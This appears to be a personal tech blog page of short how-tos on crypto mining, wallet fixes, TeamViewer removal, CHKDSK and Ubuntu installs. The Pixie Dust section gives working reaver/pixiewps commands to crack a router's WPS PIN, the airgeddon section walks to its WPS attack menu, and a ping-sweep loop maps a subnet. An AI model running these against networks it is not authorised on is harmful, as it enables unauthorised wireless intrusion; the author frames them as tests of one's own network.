Skip to content

Scanning a Network Using A MAC

  • MAC

When NMAP isn’t available, use the following

Click on Spotlight (The Magnifying Glass)

Type Terminal to open the command line

Type the following:

for i in {1..254}; do ping -c 2 192.168.1.$i | grep ‘bytes’ ; done

Press Enter

One by one, each ip will be ping’d. Slow, yes…but useful in a pinch

Mining LOKI with RX 580 Nitro on Windows 10

  • Crypto

Quick How-To Guide

I was recently approached by a gamer who had built a system over this past holiday season and wanted to get into mining with some of his rig’s spare cycles. We chatted a bit and decided LOKI had the most promise, so here is a quick how-to on what we did for his rig.

Download and install the LOKI Electron wallet from:

https://github.com/loki-project/loki-electron-gui-wallet/releases

Once the wallet is downloaded, install it, create a loki address, and copy your wallet seed. You will need that in case you have to reinstall it somewhere else, some day.

Now for the fun part

Download the latest version of XMRIG from here (this will be your mining software)

https://github.com/xmrig/xmrig/releases

Unzip the file to your desktop. You may have to add some exceptions to your Anti-Virus for it to work, because AV loves to throw all sorts of false positives

Once it is unpacked, open the XMRig Folder

Right click on START.BAT

Select Edit

Delete everything in this file, and replace it with the following:

@echo off 

xmrig.exe -a cn-trtl --donate-level 1 -o loki.miner.rocks:4005 -u WALLET-ADDRESS-HERE -p w=Rig1 -k -o ca.loki.miner.rocks:4005 -u
WALLET-ADDRESS-HERE -p w=Rig1 -k

pause

Save the File, and Exit

Now double click on Start.bat

You will see your machine start mining LOKI

Pixie Dust Attacks

Test and Secure YOUR Network Only

Run this from a linux box, against your network. Do not run this against any other network out there. It is easy to find the attacker, it is easy to prosecute the bad actor. Be very careful with this attack.

I would suggest installing Ubuntu, Kali, or ParrotOS and running from a USB drive, connected to your computer or laptop.

Open a termina

sudo bash

apt-get update
apt-get upgrade

apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

git clone https://github.com/t6x/reaver-wps-fork-t6x

cd reaver-wps-fork-t6x/
cd src/
./configure
make
make install

airmon-ng check kill
airmon-ng start wlan1

‘wash -i {monitor-interface}’

Identify your target (YOUR NETWORK ONLY) and note the name, bssid and channel. Make sure the signal is strong

reaver -i wlan1 -b {BSSID of router} -c {router channel} -vvv -K 1 -f

Your attack is now running

How to Install AIRGEDDON

This info is specific to Linux only

Open a terminal

sudo bash

mkdir /tools & cd /tools

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

cd airgeddon

ls

sudo bash

./airgeddon.sh

apt-get install and name of tool thats missing

After the dependencies are all installed, run ./airgeddon.sh and begin the configuration

Select your wireless card

Put wireless card into monitoring mode

Select WPS attacks menu – option 8

Select option 4

Select 2.4 ghz

Loki Wallet 3.0.2 & 2.0.2 Crashing in Windows 10

How to update and fix the issue above

For weeks I have been fighting with the Loki wallet on my Windows 10 VM. I even went out and built a fresh laptop with a fresh install of Windows 10, only to have LOKI crash once I put in my password.

If you are experiencing these issues too, you are not alone.

To fix this issue, I had completely wiped LOKI off of my computer. Searched the C: drive for *loki* and wiped everything. The only reason I could do this is because I had my keys backed up along with my personal seed. IF YOUR KEYS AND SEED ARE NOT BACKED UP, DO NOT DELETE ANYTHING!

So, with a fresh computer, free of loki, I downloaded the new GUI wallet from:

https://github.com/loki-project/loki-electron-gui-wallet/releases

Once the app is downloaded, install it as usual and then launch the app.

On the first time it runs, you will want to set it up to download the blockchain locally. Do not select the remote options. Then you will want to input your wallet seed. Make sure you backup the keys. Setup your wallet password, and let it sync with the blockchain. You will FINALLY see a working version of LOKI! Finally!

I am not sure what ruined their Festive Freya or Summer Sigyn, but thankfully that bug doesn’t affect their Electron wallet.

TeamViewer 14 Login Issue on Ubuntu 18.04.01

How-To Remove TeamViewer 14 From Ubuntu 18.04

Teamviewer 14 does not work on Ubuntu 18.04 at the present time. When connecting to a Headless Ubuntu Server using Teamviewer, you are prompted to login, yet your credentials do not work, and the login screen continues to loop with Login, and Invalid Password.

These steps will help you remove the product and replace it with a version or product that does work.

Use Putty locally on the same network your headless system is on

Login

sudo bash

apt-get remove teamviewer

y

reboot

Now time to replace it with a product that works.

Running Check Disk on an ESXI VM

Windows 10 VM on an ESXi 6.7 Host

It couldn’t be easier. You don’t need to do it from the command line anymore. No more reboot needed. No more 7 hour waits…

Double click This PC from your desktop

Right click the drive you want to check

Select Properties

Select the Tools tab

Click Check

Click Scan Drive to start

Once it is finished….Follow these steps to view the Check Disk (CHKDSK) results:

Open Control Panel

Select Administrative Tools

Click Event Viewer

Open the Windows Logs

Select Application log

Right Click the Application log

Click Find

Type wininit in the dialog box

Click Find Next

Click the Source/wininit line once it is found

In the lower pane, the CHKDSK log will show

Read through it carefully

Mining SUQA with NVIDIA 1080TI Cards

How To Mine SUQA on Ubuntu 18.04 with NVidia 1080 TI cards and CUDA 10

This guide assumes you already have the OS, Drivers, and CUDA installed

sudo bash

apt-get install libc-ares2

cd /miner/drivers/

wget https://github.com/technobyl/CryptoDredge/releases/download/v0.14.0/CryptoDredge_0.14.0_cuda_10.0_linux.tar.gz

tar zxvf CryptoDredge_0.14.0_cuda_10.0_linux.tar.gz

rm Cry*.z

cd CryptoDredge_0.14.0/

nano run-suqa-beepool.sh

Insert your wallet address

Save and Exit

chmod +x run-squa-beepool.sh

./run-squa-beepool.sh

That’s it. Thanks for reading!


The hardware that I used in this guide:
Gigabyte AORUS GeForce GTX 1080 Ti (QTY 6):
https://amzn.to/2JqvXC8

Motherboard (QTY 1): 
https://amzn.to/2JqGJZ7

CPU (QTY 1): 
https://amzn.to/3qevp2X

Memory (QTY 1): 
https://amzn.to/2JqHn8Z

Hard Drive (QTY 1):  
https://amzn.to/3lic3X5

Risers (QTY 6):  
https://amzn.to/33rIgVE

Power Supplies (QTY 2):
https://amzn.to/3fTRpLR

Add2PSU (QTY 1):
https://amzn.to/39s4URY

Power Switch (QTY 1):  
https://amzn.to/3ljmNVk

Ubuntu Server 16.04.05 USB Installation Requesting CD-ROM

How to fix the Insert CD-ROM Notification when you are not installing from CD-ROM

This fix is simple.  You are running the Ubuntu server installation from a USB drive. 

You get the dialog box asking for the CD-ROM…Simply remove the USB drive (that has the installation media on it) from the port that it is plugged into. 

Move it to another USB Port….and the installation will find the device, think it is a CD-ROM and the install will continue.